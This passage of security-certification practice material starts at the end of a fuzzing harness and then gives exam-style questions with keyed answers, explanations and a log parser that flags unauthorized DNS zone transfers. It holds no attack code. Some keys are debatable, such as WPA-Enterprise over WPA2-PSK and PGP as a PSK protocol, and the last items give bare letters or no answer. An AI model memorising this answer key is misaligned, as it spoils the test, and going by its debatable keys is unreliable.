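# Valid seed: length 3, payload "abc", checksum = 'a' ^ 'b' ^ 'c'.
SEED = bytes([3]) + b"abc" + bytes([ord("a") ^ ord("b") ^ ord("c")])

if __name__ == "__main__":
    print("buggy :", fuzz(parse_record, SEED, 2000))
    print("fixed :", fuzz(parse_record_fixed, SEED, 2000))
```

Each finding is stored with the input that produced it, which is what a real fuzzer saves as a reproducer; the fixed seed makes the run repeatable so the same crash can be reproduced after the patch.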

Which of the following should be done if an audit recording fails? A. Stop generating audit records.B. Overwrite the oldest audit records.C. Send an alert to the administrator.D. Shut down the server.

C. If an audit recording fails, there should be sufficient safeguards employed that can automatically send an alert to the administrator, among other things. Audit records should not be overwritten and in general should not be stopped.

You have been tasked with securing a switch from physical access. Which of the following should you implement first? Set up access control lists. Check the baseline configuration. Disable unused ports. Disable unnecessary accounts.

C. If you need to physically secure a switch, you should first disable unused ports so that a person who has gained unauthorized access to your server room or data center cannot plug a laptop into one of those ports and access the network. It would also be wise to check (or create) a security baseline at some point after this. See the section titled "Network Design" in Chapter 6, "Network Design Elements," for more information. Incorrect answers: Access control lists are a logical control (typically configured on routers or Layer 3 switches); they do not address physical access. The same holds true for accounts; they are of a logical nature and are usually set up on servers and routers.

A computer that is connected to an NAC-enabled network is not asked for the proper NAC credentials. What is a possible reason for this? The computer is not patched. The computer doesn't have the latest antivirus definitions. The computer is missing the authentication agent. The computer does not have the latest SP.

C. In a network access control (NAC) enabled network, computers must have the authentication agent installed; otherwise, the NAC system will not ask for the credentials (and the computer will not get access to the network). The authentication agent is also known as a supplicant (in 802.1X systems, for example). See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: The patch level, antivirus definitions, and service packs (SPs) are separate from the NAC system.

Which of the following is the best practice to implement when securing logs files?A. Log all failed and successful login attempts.B. Deny administrators access to log files.C. Copy the logs to a remote log server.D. Increase security settings for administrators.

C. It is important to copy the logs to a secondary server in case something happens to the primary log server (or an attacker on it clears the logs); this way you have another copy of any possible security breaches. Logging all failed and successful login attempts is a useful audit practice, but it does not by itself protect the log files and it generates a large volume of entries. The rest of the answers are not good ideas when working with log files: administrators need access to the logs, and raising their security settings does nothing for the files themselves.

What is one reason to implement security logging on a DNS server? To perform penetration testing on the server To prevent DNS DoS To watch for unauthorized zone transfers To measure server performance

C. It is important to log your DNS server to monitor for unauthorized zone transfers. This type of logging only tells you that a transfer was requested or has occurred; it does not prevent it (restricting transfers to your known secondary servers in the server's configuration does that), nor will it prevent any type of denial-of-service (DoS) attack.
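The detection the answer describes is a few lines of log parsing. The following added example (not from the book) takes constructed lines written in the style of BIND's query log, pulls out the client address, zone name, and query type, and reports every AXFR or IXFR request from a host that is not on the allow list of known secondaries. The log lines, the allow list, and the IP addresses are made up for the example.

```python
import re
from collections import Counter

# Constructed lines in the style of BIND's query log (not from a real server).
SAMPLE_QUERY_LOG = """\
05-Jan-2024 10:00:01.101 client @0x7f1a2c0 192.168.1.15#52311 (www.example.com): query: www.example.com IN A +E(0)K (192.0.2.53)
05-Jan-2024 10:00:03.402 client @0x7f1a2c0 192.0.2.54#46021 (example.com): query: example.com IN AXFR -ET(0)K (192.0.2.53)
05-Jan-2024 10:00:09.777 client @0x7f1a2c0 203.0.113.9#40123 (example.com): query: example.com IN AXFR -ET(0)K (192.0.2.53)
05-Jan-2024 10:00:10.012 client @0x7f1a2c0 203.0.113.9#40124 (example.com): query: example.com IN IXFR -ET(0)K (192.0.2.53)
05-Jan-2024 10:00:12.340 client @0x7f1a2c0 192.168.1.22#61011 (mail.example.com): query: mail.example.com IN MX +E(0)K (192.0.2.53)
"""

# Hosts permitted to pull the zone (our secondary server); a constructed allow list.
AUTHORIZED_SECONDARIES = {"192.0.2.54"}

QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9.]+)#\d+ \((?P<qname>[^)]*)\): "
    r"query: \S+ IN (?P<qtype>[A-Z0-9]+)"
)

ZONE_TRANSFER_TYPES = {"AXFR", "IXFR"}


def parse_queries(text: str):
    """Yield (client_ip, qname, qtype) for every line that matches the log format."""
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("ip"), m.group("qname"), m.group("qtype")


def unauthorized_zone_transfers(text: str, allowed=AUTHORIZED_SECONDARIES) -> list:
    """Return (client_ip, zone, qtype) for every AXFR/IXFR from a host not on the allow list."""
    return [
        (ip, qname, qtype)
        for ip, qname, qtype in parse_queries(text)
        if qtype in ZONE_TRANSFER_TYPES and ip not in allowed
    ]


def transfer_attempts_by_client(text: str) -> Counter:
    """How many transfer requests each client made, authorized or not."""
    return Counter(ip for ip, _q, qtype in parse_queries(text) if qtype in ZONE_TRANSFER_TYPES)


if __name__ == "__main__":
    for ip, zone, qtype in unauthorized_zone_transfers(SAMPLE_QUERY_LOG):
        print(f"ALERT unauthorized {qtype} of {zone} from {ip}")
    print(transfer_attempts_by_client(SAMPLE_QUERY_LOG))
```

An AXFR from an unknown address is worth an alert even when the server refused it, because it shows someone enumerating your zone; whether the transfer actually succeeded is a separate question answered by the server's transfer log or its allow-transfer configuration.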

Your organization wants to improve its security posture by addressing risks uncovered by a recent penetration test. Which of the following is most likely to affect the organization on a day-to-day basis? Large-scale natural disaster Corporate espionage Lack of antivirus software Insufficient encryption

C. Of the answers, the most likely to affect the organization on a day-to-day basis is a lack of antivirus software. Let's say the organization had 100 computers and 20% of them were not protected by AV software. Chances are that a good portion of those computers would be infected over the course of the year. AV software should be installed on all client systems and patched regularly. Centralized management software can be used to scan the network and find out what systems are not up to date. See the section "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: A penetration test is used to discover weaknesses in a server or a network. It does not tell you the likelihood of a natural disaster, but the chances of one are slim, and much less likely to affect the organization than a lack of AV software. Corporate espionage could be more common, especially if an organization deals with government secrets, patents, new products, and so on. But, once again, a penetration test will probably not uncover corporate espionage. Insufficient encryption is the next best answer to lack of AV software. It is a definite problem, but it all depends on the organization in question. Some organizations require more encryption than others. Still, it is not likely to affect an organization as much as a lack of AV software.

Which of the following is the best description of a security advantage when using a standardized server image? All antivirus software will be current. All current updates for the OS will already have been applied. All mandated security configurations will already have been applied to the OS. OS licensing will be easier to track.

C. Organizations develop standardized images for their server operating systems. They are standardized according to organizational policy. So, any mandated security configurations should be applied to the OS before it is made into an image to be used on the network. Unfortunately, that only gets the OS image to a certain point in time. See the section titled "Virtualization Technology" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Any new AV definitions, security updates to the OS, and so on, will need to be applied afterward according to organizational policy. OS licensing trackability should not change. Whether you track your OS licenses on paper or with a scanning program, they should be tracked in the same manner as with physical operating systems.

When authenticating with PEAP, what is used to provide mutual authentication between peer computers? MSCHAPv1 MD5 MSCHAPv2 EAP

C. PEAP most commonly carries MSCHAPv2 inside its TLS tunnel. MSCHAPv2 is a challenge/response method in which both sides prove knowledge of the password, and it supports authentication against Microsoft Active Directory databases. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: MSCHAPv1 does not provide mutual authentication and is not used in PEAP. MD5 is a hashing algorithm, not an authentication method, and is not used by PEAP; it is used in EAP-MD5, which is also challenge-based but authenticates only the client. PEAP is itself a derivative of EAP (Extensible Authentication Protocol), so EAP is the framework rather than the inner method.

Which of the following encryption protocols uses a PSK? TPM CRL PGP DLP

C. PGP (Pretty Good Privacy) is the only encryption protocol among the choices, and it is the expected answer: a preshared key (PSK) is a key that was shared between two parties over a secure channel before it is used to decrypt data. Strictly speaking, PGP is a hybrid system: it generates a random session key for each message and protects that key with the recipient's public key, and it also supports symmetric-only (passphrase) encryption. TPM is a hardware chip, a CRL is a list of revoked certificates, and DLP is data loss prevention; none of them is an encryption protocol.

Which of the following is the best reason to perform a penetration test? To identify all vulnerabilities and weaknesses within your network To passively test security controls To determine the potential impact of a threat against your network To find the security posture of the network

C. Penetration tests are usually designed to simulate a particular attack, allowing the administrator to determine the potential impact of that threat to the network. See the section titled "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: Penetration tests are not designed to identify all vulnerabilities and weaknesses; to do that, you would use a vulnerability scanner, among other things. Penetration tests are not passive; they are active tests that should be done off-hours and with much preparation beforehand. The security posture of the network is usually discerned by security assessments and baseline reporting.

Which of the following solutions should be used by heavily utilized networks? VPN concentrator Remote access Provider cloud Telephony

C. Provider clouds can offer Infrastructure as a Service (IaaS), which can alleviate some of the stress an organization's network might suffer from. In addition, provider clouds can offer software (SaaS) and platforms (PaaS). See the section titled "Cloud Security and Server Defense" in Chapter 6, "Network Design Elements," for more information. Incorrect answers: VPN concentrators and remote access are not good choices for heavily utilized networks. They are meant for smaller groups of remote users. Telephony is not a solution for heavily utilized networks. It is quite the opposite; often networks are the solution for telephony usage.

To determine network access requirements, a person working in HR has been tasked with assigning users in Accounting the same job function. What is this an example of? MAC DAC RBAC ACL

C. Role-based access control (RBAC) is when individuals are assigned groups of permissions that constitute a role. While a person in HR might not assign job functions within the operating system directly, the person will commonly assign the job functions for each user in some type of paper or electronic document and deliver that document to a security administrator who then implements those job functions within the operating system. See the section titled "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Mandatory access control (MAC) is a model that determines permissions by a computer system. Discretionary access control (DAC) is when permissions are determined by the owner. An ACL is an access control list, which defines what IP addresses (or users) can access particular networks or resources.

You need to protect passwords. Which of the following protocols is not recommended because it can supply passwords over the network? DNS ICMP SNMP Kerberos

C. SNMP (Simple Network Management Protocol) versions 1 and 2c send their community strings, which act as passwords, in cleartext over the network. This is a security risk and should be avoided if possible; at the very least use SNMPv3 with authentication and privacy (authPriv), and be careful to protect devices that use SNMP for monitoring, such as switches, UPSs, and so on. See the section "Using Tools to Monitor Systems and Networks" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: DNS (Domain Name System) and ICMP (Internet Control Message Protocol) do not supply passwords over the network. Kerberos does not send the password itself; the client proves knowledge of it by encrypting a timestamp with a key derived from the password, and the resulting tickets are encrypted.

A security incident just occurred involving a physical asset (a USB flash drive). Immediately afterward, what should be done first? Document the incident and how it was mitigated Create a working image of the data Record every person who was in possession of the asset during and after the incident Back up the device

C. The first thing you want to know is who was in possession of the USB flash drive. This will be important for your chain of custody, in case the asset is used as evidence in a trial. After the incident, continue logging who takes possession of the drive and when. See the section "Incident Response Procedures" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Documentation is important, and in fact, recording each person who was in possession of the drive is a form of documentation. But other documentation such as mitigation methods is not important right away, aside from the fact that mitigation might not have been implemented yet. You don't want to back up the device in the ordinary way, because mounting the drive read-write alters it; instead take a forensic image through a write blocker for data preservation purposes. That, too, is done after you document who had possession of the drive.

Tom is getting reports from several users that they are unable to download specific items from particular websites, although they can access other pages of those websites. Also, they can download information from other websites just fine. Tom's IDS is also sending him alarms about possible malicious traffic on the network. What is the most likely cause why the users cannot download the information they want? The firewall is blocking web activity. The NIDS is blocking web activity from those specific websites. The NIPS is blocking web activity from those specific websites. The router is blocking web activity.

C. The most likely answer is that the network intrusion prevention system (NIPS) is blocking the specific traffic because it has detected that particular downloads could be malicious. See the section titled "NIDS Versus NIPS" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A NIDS would only detect this and send alarms to Tom; it would not prevent the traffic. The firewall will usually block entire websites from being accessed, not just prevent specific downloads. The router will not block web activity, although it could block access to particular IP addresses. However, if this were the case, the users would not be able to access the website in question.

When you arrive at work in the morning, you discover that the server room has been the victim of a fire, and all the servers have been rendered useless. Which of the following is the most important item to have to ensure that your organization can recover from this disaster? Warm site Offsite backup Disaster recovery plan Fault-tolerant servers

C. The single most important thing that you should have in the case of a disaster is a disaster recovery plan (DRP). This needs to detail exactly who you should contact, what you should do, where you should go, and where your data should be located in the case of a disaster. See the section "Disaster Recovery Planning and Procedures" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: A warm site is a secondary work location designed for your employees that can be up and running in a matter of hours. Offsite backup means that your files are backed up (often to tape), and transported to a separate secure location. Fault-tolerant servers are ones that can keep running in the event of a failure—they could be onsite or offsite—in the case of offsite they might exist in the cloud and interact with onsite servers. A DRP should include everything mentioned: warm sites, offsite backup, and fault tolerant servers.

You are configuring an 802.11n wireless network. You need to have the best combination of encryption and authorization. Which of the following options should you select? WPA2-PSK WEP and 802.1X WPA-Enterprise WPA and TKIP

C. WPA-Enterprise offers a decent level of encryption (WPA with TKIP) together with strong authentication: Enterprise mode means each user authenticates through 802.1X to a separate RADIUS server, or something similar, rather than with a single passphrase stored on the wireless device itself. See the section titled "Securing Wireless Networks and Devices" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Although WPA2-PSK offers stronger encryption (AES-CCMP), it authenticates every user with the same preshared key and offers no per-user authorization the way an enterprise configuration does. The combination of WEP and 802.1X does offer per-user authentication, but WEP is broken and deprecated and is not recommended in any scenario. WPA with TKIP offers the same level of encryption as WPA-Enterprise but relies on a preshared key and does not offer per-user authorization.

Which of the following computer security threats can be updated auto- matically and remotely? (Select the best answer.) A. VirusB. WormC. ZombieD. Malware

C. Zombies (also known as zombie computers) are systems that have been compromised without the knowledge of the owner. A prerequisite is that the computer must be connected to the Internet so that the attacker or malicious program can reach the computer and control it remotely, including pushing updated instructions or malware to it. Multiple zombies working in concert form a botnet. See the section "Delivery of Malware" earlier in this chapter for more information.

You are in charge of decreasing the chance of social engineering in your organization. Which of the following should you implement? A two-factor authentication scheme Vulnerability assessment Security awareness training Risk assessment

CD. Of the listed answers, the two best ways to decrease social engineering are to incorporate security awareness training and implement a multifactor authentication scheme. For example, users might be required to identify themselves with an ID card and by presenting a thumbprint for biometric scanning. See the section "Social Engineering Methods and Prevention" in Chapter 17 "Social Engineering, User Education, and Facilities Security," for more information. Incorrect answers: Risk assessments and vulnerability assessments are performed to find out what kind of threats an organization faces. A viable threat might include social engineering; however, risk and vulnerability assessments will not decrease the chance of social engineering occurring.

What should a disaster recovery plan (DRP) contain? Hierarchical access control lists Single points of failure Hierarchical list of hot sites Hierarchical list of critical systems

D. A disaster recovery plan should contain (among other things) a list of critical systems in order from the most critical to the least critical. See the section titled "Disaster Recovery Planning and Procedures" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: Access control lists don't fail, but the router that they are contained within may fail; therefore, the routers should be listed as critical systems. Anything could be a single point of failure. If a single point of failure cannot be tolerated, it needs to be mitigated in the form of fault tolerance (UPS, RAID, clustering, and so on). Generally, an organization will have only one hot site because hot sites are expensive to maintain.

What is a malicious attack that executes at the same time every week? A. VirusB. WormC. RansomwareD. Logic bomb

D. A logic bomb is a malicious attack that executes at a specific time. Viruses normally execute when a user inadvertently runs them. Worms can self-replicate at will. Ransomware is a type of malware that restricts access to files (or entire systems) and demands a ransom be paid.

A customer has asked you to implement a solution to hide as much information about the internal structure of the network as possible. The customer also wants to minimize traffic with the Internet and does not want to increase security risks to the internal network. Which of the following solutions should you implement? NIDS Firewall Protocol analyzer Proxy server

D. A proxy server, specifically a caching proxy, will minimize traffic with the Internet. Users who access the same websites will get their information from the proxy server instead of from the Internet. An IP proxy server will hide information about the internal structure of the network. Proxy servers are available that can handle both of these functions. See the section titled "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A NIDS, network intrusion detection system, detects attacks on the network. A firewall closes off ports on the network, and although some firewalls also come with proxy functionality, it is not the best answer for this scenario. Protocol analyzers, also known as network sniffers, can analyze packets of information that have been captured.

One of the users in your organization is attempting to access a secure website. However, the certificate is not recognized by his web browser. Which of the following is the most likely reason? Weak certificate cipher No key escrow was implemented Intermittent Internet connection Self-signed certificate

D. A self-signed certificate is one that the website creator has created and signed. Because the certificate did not come from a known third-party security company, the web browser does not recognize it in this scenario. See the section titled "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: A weak certificate cipher is usually recognized, but the web browser will display a warning of some sort or perhaps block initial attempts to access the web page. Key escrow is when keys are held for third-party organizations in case they need access to data.

A malicious computer is sending data frames with false hardware addresses to a switch. What is happening? DNS poisoning pWWN spoofing MAC spoofing ARP poisoning

D. ARP poisoning is an attack that exploits Ethernet networks—spoofed frames of data will contain false MAC addresses, ultimately sending false hardware address updates to a switch. See the section titled "Malicious Attacks" in Chapter 7, "Networking Protocols and Threats," for more information. Incorrect answers: DNS poisoning is the unauthorized modification of name resolution information. pWWN spoofing is a type of spoof attack carried out on SANs. MAC spoofing is a technique for changing the MAC address of a network adapter.

What needs to be configured to offer remote access to a network? Tokens Biometrics Supplicants ACLs

D. Access control lists (ACLs) need to be configured properly for users to gain remote access through a firewall/router and proceed to the main network. See the section titled "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Tokens are used in authentication schemes (often local) but are usually generated with little configuration. Biometrics is the authentication of individuals through physical characteristics. Supplicants (authentication agents) are usually loaded on computers in an 802.1X NAC network, which is usually local and with little configuration.

Which of the following is a removable device that can be used to encrypt in a high-availability, clustered environment? Biometrics Cloud computer TPM HSM

D. An HSM (hardware security module) is a device used to manage digital keys and provide authentication. It can be connected to a computer, a server, or a particular server in a clustered environment. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: Biometrics is the science of authenticating individuals by their physical traits. A cloud computer is a computer that resides on the Internet and is run by a third-party service provider that offers various computing services to individual users and small to midsized companies. A TPM is a trusted platform module that is similar to an HSM but is internal to the computer, perhaps as a chip on the motherboard.

Randy needs an external add-on solution that can provide encryption and integrate with his existing database server. Which of the following would meet his needs? TPM FDE CAC HSM

D. An HSM (hardware security module) provides encryption and can be an external device that can integrate with an existing server. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: A TPM (trusted platform module) is an encrypting chip that resides on a motherboard. FDE stands for full disk encryption, which can be implemented with a TPM. CAC stands for Common Access Card, a smart ID card used by the Department of Defense (DoD).

Which of the following types of viruses hides its code to mask itself? A. Stealth virus B. Polymorphic virus C. Worm D. Armored virus

D. An armored virus attempts to make disassembly difficult for an antivirus software program. It thwarts attempts at code examination. Stealth viruses attempt to avoid detection by antivirus software altogether. Polymorphic viruses change every time they run. Worms are not viruses.

You have disabled all unnecessary services on a domain controller. What is this an example of? Secure code review Baselining Patch management strategy Application hardening

D. Application hardening is the securing of an application, disabling of unnecessary services, disabling unused accounts, removal of unnecessary applications, and so on. See the section titled "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Secure code review is the analysis of code to make sure it cannot be corrupted; this is done through input validation, checking for unmanaged code, checking for sensitive data, and so on. Baselining is the process of measuring changes in a system. Patch management strategy is the entire four-step process involved when adding patches to a system.

A programmer wants to prevent cross-site scripting. Which of the following should the programmer implement? Validation of input to remove bit code Validation of input to remove shell scripts Validation of input to remove batch files Validation of input to remove hypertext

D. Cross-site scripting (XSS) is a vulnerability to web applications. For example, a malicious attacker might attempt to inject hypertext into a standard text-based web form. See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: Shell scripts, batch files, and Java bit code are not associated with XSS attacks.

Michael has just completed monitoring and analyzing a web server. Which of the following indicates that the server might have been compromised? A. The web server is sending hundreds of UDP packets. B. The web server has a dozen connections to inbound port 80. C. The web server has a dozen connections to inbound port 443. D. The web server is showing a drop in CPU speed and hard disk speed.

D. If the web server is showing a drop in processor and hard disk speed, it might have been compromised. Further analysis and comparison to a pre-existing baseline would be necessary. All the other answers are common for a web server.

Which of the following is a common symptom of spyware? A. Infected files B. Computer shuts down C. Applications freeze D. Pop-up windows

D. Pop-up windows are common to spyware. The rest of the answers are more common symptoms of viruses.

Your organization uses a type of cryptography that provides good security but uses smaller key sizes and utilizes logarithms that are calculated against a finite field. Which type of cryptography does your organization use? Quantum cryptography Diffie-Hellman RSA Elliptic curve

D. Elliptic curve cryptography (ECC) is based on the difficulty of solving certain math problems and is calculated against a finite field. It uses smaller key sizes than most other encryption methods. See the section titled "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: Quantum cryptography is a newer type of encryption method based on quantum mechanics

A co-worker's laptop has been compromised. What is the best way to mitigate data loss? Common Access Card Strong password Biometric authentication Full disk encryption

D. Full disk encryption is the best way (listed) to mitigate data loss in the case of a stolen or otherwise compromised laptop because it will be difficult to decrypt the data on the laptop. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: A Common Access Card is a smart card/photo ID used by the DoD. Strong passwords are a good idea on portable devices but can be cracked or circumvented more easily than a full disk encryption solution. Biometric authentication can also be cracked given enough time.

You have received several reports from users of corrupted data. You patched the affected systems but are still getting reports of corrupted data. Which of the following methods should you use to help identify the problem? Data integrity check Penetration testing Hardware baseline review Vulnerability scan

D. If the data is becoming corrupted more than once even after an update to the affected systems, you should perform a vulnerability scan to find out what the possible threats and vulnerabilities are to those systems. See the section titled "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: A data integrity check would simply tell you that the data has been corrupted and, therefore, that integrity is not intact. Penetration testing determines whether a system can be compromised by exploiting a particular threat. A hardware baseline review will tell you how your hardware is performing and how secure it is compared to the last baseline. Baselines are examples of vulnerability assessments, but in this case you need a software-based vulnerability assessment.

Your organization has a PKI. Data loss is unacceptable. What method should you implement? CRL Web of trust CA Key escrow

D. Key escrow should be implemented if data loss is unacceptable. This is when keys are held in case another party needs access to secured communications. See the section titled "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: The CRL is the certificate revocation list. A web of trust is a decentralized model used for the management of keys. A CA (certificate authority) is a centralized model used for the management of keys.

Which of the following concepts best describes the mandatory access control model? Bell-LaPadula Clark-Wilson Biba Lattice

D. Mandatory access control (MAC) has two common implementations: rule-based access control and lattice-based access control. Lattice-based access control is used for more complex determinations of object access by subjects; this is done with advanced mathematics that creates sets of objects and subjects and defines how the two interact.

You and your security team have established a security awareness program to help educate the employees in your organization. Which of the following would give you the best indication of the success of the program? (select two) Procedures Policies Standards Metrics

D. Metrics are actual data that enables an administrator to see the performance of a particular training program or technology. In this scenario, a good way to obtain metrics would be to test the employees after training. Collect the information by computer to see how well the employees performed as a whole, and therefore how well they know the content of the training. The concept can be applied to technologies such as servers and networking connections as well. See the section "User Education" in Chapter 17, "Social Engineering, User Education, and Facilities Security," for more information. Incorrect answers: Policies and procedures are written to increase the level of security and reduce risk to an organization, but do not indicate whether they are successful or not. The same holds true for standards. Standards and protocols are used to provide a commonality between employees when they work on their computers. It could be as simple as logging in before starting work, or as complex as using a cipher suite such as TLS (including RSA, AES, and SHA-1) when connecting to the organization's website. But you would have to test those protocols and connections to make sure they work. Multiple tests and baselining could ultimately provide metrics.

You ran a penetration test against your two database servers and found out that each of them could be compromised with the default database user account and password. Which of the following did you forget to do to your database servers? OS hardening Patch management Virtualization Application hardening

D. Part of application hardening includes renaming (or disabling) default accounts and setting complex passwords. If these steps are not taken, compromising the application becomes very easy for attackers. See the section titled "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: OS hardening is not correct in this instance because it is the database that can be compromised using the default database username/password. Databases are considered to be applications, not operating systems. Patch management won't affect the default user account. The account has to be secured manually. Virtualization of operating systems doesn't come into play here, although it could help to have backup virtual images made in the case that the database server is compromised.

Which of the following methods can possibly identify when an unauthorized access has occurred? Session lock mechanism Session termination mechanism Two-factor authentication Previous logon notification

D. Previous logon notification notifies the user and possibly the administrator of when the last-known good logon occurred. If a user knows that they did not log on at that time, it is a good indicator that unauthorized access occurred. See the section "Rights, Permissions, and Policies" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Session lock mechanisms can be implemented on several different types of operating systems. For example, in Windows a policy can be created to lock the computer after a specific timeout. Sessions can also be terminated automatically via systems such as an FTP server after a specific timeout. Two-factor authentication is a type of multifactor authentication in which two types of identification are necessary to gain access to a network.

MD5 can be manipulated by creating two identical hashes using two different messages, resulting in a collision. This is difficult (if not impossible) to do with SHA-256. Why is this? SHA-256 has greater collision strength than MD5. MD5 has greater collision resistance than SHA-256. MD5 has greater collision strength than SHA-256. SHA-256 has greater collision resistance than MD5.

D. SHA-256 has greater collision resistance than MD5 because it employs a 256-bit hash, whereas MD5 employs a 128-bit hash. See the section "Hashing Basics" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: MD5 has weaker collision resistance than SHA-256. We aren't concerned with collision "strength" so to speak, but are more concerned with the cryptographic hash's resistance to collisions.

Your boss asks you to replace the current RADIUS authentication system with a more secure system. Your current RADIUS solution supports EAP, and your new solution should do the same. Which of the following is the best option and would offer the easiest transition? CHAP SAML Kerberos Diameter

D. The Diameter protocol is, like RADIUS, another AAA protocol, but is a more evolved protocol and utilizes more reliable transport mechanisms such as TCP and Stream Control Transmission Protocol (SCTP), as opposed to UDP. Like RADIUS, many Diameter applications allow for the use of the Extensible Authentication Protocol (EAP). See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: CHAP (Challenge-Handshake Authentication Protocol) is an authentication scheme used to authenticate a user or host. Whereas RADIUS and Diameter are authentication systems, they both make use of authentication schemes such as PAP, CHAP, and EAP. SAML (Security Assertion Markup Language) is an XML-based open standard for exchanging authentication and authorization data between two parties. It helps alleviate problems with single sign-on (SSO). Kerberos is another type of authentication system, but is used more commonly in localized environments; it is not meant as a replacement for RADIUS.

Ann has been asked by her boss to periodically ensure that a domain controller/DNS server maintains the proper security configuration. Which of the following should she review? Firewall logs NIPS logs WINS configuration User rights

D. The best answer is user rights. A domain controller is in charge of user accounts and the permissions (rights) associated with those users.

One of the users in your organization informs you that her 802.11n network adapter is connecting and disconnecting to and from an access point that was recently installed. The user has Bluetooth enabled on the laptop. A neighboring company had its wireless network compromised last week. Which of the following is the most likely cause of the disconnections? The attacker that compromised the neighboring company is running a war-driving attack. A Bluetooth device is interfering with the user's laptop. An attacker in your organization is attempting a bluejacking attack. The new access point was not properly configured and is interfering with another access point.

D. The most likely cause is that the new access point the laptop is connecting to was not configured properly. Perhaps the antennas were not set to a high enough power level, or the placement of the AP is not close enough to the laptop. See the section titled "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Less likely is the possibility that an attacker is running a war-driving attack against your network. It is possible that a Bluetooth device is causing interference (because both share the 2.4-GHz spectrum), but it is also less likely. A bluejacking attack (if successful) would probably not affect the ability of an 802.11n network adapter to connect with an access point.

You are tasked with implementing an access point to gain more wireless coverage. What should you look at first? SSID Radio frequency Encryption type Power levels

D. The power levels will dictate how far an access point can transmit its signal. For more coverage, increase the power levels, but be careful not to go beyond your organization's work area, or other neighboring entities might try to compromise your network.

A visitor plugs her laptop into the network in the conference room and attempts to start a presentation that requires Internet access. The user gets a warning on the screen saying that her antivirus software is not up to date. As a result, the visitor is unable to access the Internet. What is the most likely cause of this? The security posture on the network is disabled, and remediation must take place before the user can access the Internet. The IDS blocked access to the network. The IPS prevented access to the network. The security posture on the network is enabled, and remediation must take place before the user can access the Internet.

D. The security posture can be defined as the risk level to which a system is exposed. If enabled, a system will need to meet particular security requirements. In this case, the user cannot access the Internet with her laptop until the antivirus software is updated (the remediation). See the section titled "Monitoring Methodologies" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: If the security posture were disabled, the user would not need to update her system. An IDS will not block access to the network. Instead, an IDS will detect malicious activity on the network. An IPS is not designed to prevent internal users from accessing the network; it is designed to prevent malicious activity on the network.

A thumb drive has been used to compromise systems and enable unauthorized access. What kind of malware was most likely installed to the thumb drive? Bot Logic bomb Virus Trojan

D. Trojans are used to access a system without authorization. They can be installed to USB flash drives, can be remote access programs, or could be unwittingly stumbled upon when accessing disreputable websites. The key phrase here is "unauthorized access"; that is what the Trojan is trying to do. See the section titled "Malicious Software Types" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: A bot is a computer that performs actions without the user's consent and is often controlled by a remote master computer. Although the bot doesn't enable unauthorized access, a Trojan might carry a bot program as part of its payload. Logic bombs are generally a method of transferring malware and are meant to initiate a malicious function at a specific time. Viruses infect a computer but are not used for unauthorized access.

Tara has written an application and is ready to go through the hardening process. Which of the following could be considered a hardening process of the SDLC? Disabling unnecessary services Application patching management schedule Disabling unnecessary accounts Secure coding concepts

Secure coding concepts such as input validation will help to harden an application within the systems development life cycle (SDLC). See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: Although disabling unnecessary services and accounts and patching the application are important, these could all be considered application or server hardening, not hardening within the SDLC.

Which of the following is used to validate whether trust is in place and accurate by returning responses of "good," "unknown," or "revoked"? OCSP PKI CRL RA

A

Which one of the following attacks misuses the Transmission Control Protocol three-way handshake process in an attempt to overload network servers so that authorized users are denied access to network resources? SYN attack Man-in-the-middle attack Teardrop attack Smurf attack

A

On Monday, all employees of your organization report that they cannot connect to the corporate wireless network, which uses 802.1X with PEAP. A technician verifies that no configuration changes were made to the wireless network and its supporting infrastructure, and that there are no outages. Which of the following is the most likely cause of the problem? The Remote Authentication Dial-In User Service certificate has expired. The DNS server is overwhelmed with connections and is unable to respond to queries. There have been too many incorrect authentication attempts and this caused users to be temporarily disabled. The company IDS detected a wireless attack and disabled the wireless network.

